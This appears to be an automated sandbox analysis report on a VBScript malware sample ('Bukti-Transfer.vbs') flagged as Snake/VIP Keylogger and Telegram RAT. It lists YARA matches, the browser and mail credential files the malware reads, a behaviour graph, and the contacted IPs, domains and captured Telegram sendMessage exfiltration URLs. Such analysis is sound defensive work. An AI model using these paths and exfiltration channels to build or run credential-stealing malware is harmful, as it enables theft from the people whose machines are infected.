Source: Yara match File source: 00000002.00000002.1800079314.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2982352681.0000000003148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973181708.0000000002594000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2989673597.0000000002637000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2982055964.0000000003477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2990666211.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2989928509.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2979628211.0000000002655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2980958448.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2977673273.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2956440801.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2977671977.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1900190311.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2976208551.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Service.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Service.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2973181708.00000000024FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2978687690.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1800079314.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2976208551.000000000314C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2977671977.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1900190311.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2989084490.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.2990666211.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2984356674.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2982055964.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2980427569.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2989084490.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2977007096.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2980958448.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2979628211.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2977673273.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2978687690.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2989517140.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2982352681.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973181708.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2989673597.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2988389961.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2979365430.0000000002451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2989928509.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2976208551.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2980425692.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2983393023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2977671977.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1800079314.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1900190311.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected VIP Keylogger
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2979365430.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2977007096.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2983393023.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2978687690.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2980425692.0000000002557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2984356674.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2980427569.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2989084490.0000000003566000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2988389961.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2989517140.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1800079314.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2982352681.0000000003148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973181708.0000000002594000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2989673597.0000000002637000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2982055964.0000000003477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2990666211.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2989928509.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2979628211.0000000002655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2980958448.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2977673273.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2956440801.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2977671977.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1900190311.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2976208551.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500267 Sample: Bukti-Transfer.vbs Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 57 reallyfreegeoip.org 2->57 59 api.telegram.org 2->59 61 3 other IPs or domains 2->61 73 Multi AV Scanner detection for domain / URL 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 83 16 other signatures 2->83 9 wscript.exe 3 15 2->9         started        14 Service.exe 2->14         started        16 Service.exe 2->16         started        18 2 other processes 2->18 signatures3 79 Tries to detect the country of the analysis system (by using the IP) 57->79 81 Uses the Telegram API (likely for C&C communication) 59->81 process4 dnsIp5 63 192.210.215.11, 49730, 80 AS-COLOCROSSINGUS United States 9->63 53 C:\Users\user\AppData\Local\Temp\MKLTPZ.js, Unicode 9->53 dropped 55 C:\Users\user\AppData\Local\...\aus1[1].js, Unicode 9->55 dropped 97 System process connects to network (likely due to code injection or exploit) 9->97 99 Benign windows process drops PE files 9->99 101 VBScript performs obfuscated calls to suspicious functions 9->101 103 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->103 20 wscript.exe 1 2 9->20         started        105 Antivirus detection for dropped file 14->105 107 Machine Learning detection for dropped file 14->107 109 Injects a PE file into a foreign processes 14->109 23 Service.exe 14->23         started        35 4 other processes 14->35 111 Creates multiple autostart registry keys 16->111 26 Service.exe 16->26         started        37 4 other processes 16->37 28 PbsonX.exe 2 18->28         started        31 PbsonX.exe 18->31         started        33 PbsonX.exe 18->33         started        39 7 other processes 18->39 file6 signatures7 process8 dnsIp9 49 C:\Users\user\AppData\Local\Temp\PbsonX.exe, PE32 20->49 dropped 41 PbsonX.exe 2 4 20->41         started        85 Tries to steal Mail credentials (via file / registry access) 26->85 87 Tries to harvest and steal browser information (history, passwords, etc) 26->87 65 193.122.6.168, 49820, 49821, 49822 ORACLE-BMC-31898US United States 28->65 file10 signatures11 process12 file13 51 C:\Users\user\AppData\Roaming\Service.exe, PE32 41->51 dropped 89 Antivirus detection for dropped file 41->89 91 Machine Learning detection for dropped file 41->91 93 Creates multiple autostart registry keys 41->93 95 Injects a PE file into a foreign processes 41->95 45 PbsonX.exe 15 2 41->45         started        signatures14 process15 dnsIp16 67 api.telegram.org 149.154.167.220, 443, 49774, 49856 TELEGRAMRU United Kingdom 45->67 69 reallyfreegeoip.org 188.114.96.3, 443, 49732, 49734 CLOUDFLARENETUS European Union 45->69 71 3 other IPs or domains 45->71 113 Tries to steal Mail credentials (via file / registry access) 45->113 signatures17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
193.122.6.168
 unknown United States
31898 ORACLE-BMC-31898US false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.130.0
 unknown United States
31898 ORACLE-BMC-31898US false
192.210.215.11
 unknown United States
36352 AS-COLOCROSSINGUS true
142.250.110.109
 smtp.gmail.com United States
15169 GOOGLEUS false
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
smtp.gmail.com 142.250.110.109 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:01:17%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:39:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:11:10%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:21:09%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:01:14%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:49:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:11:13%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:10:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:09:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:40:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:31:07%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:30:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
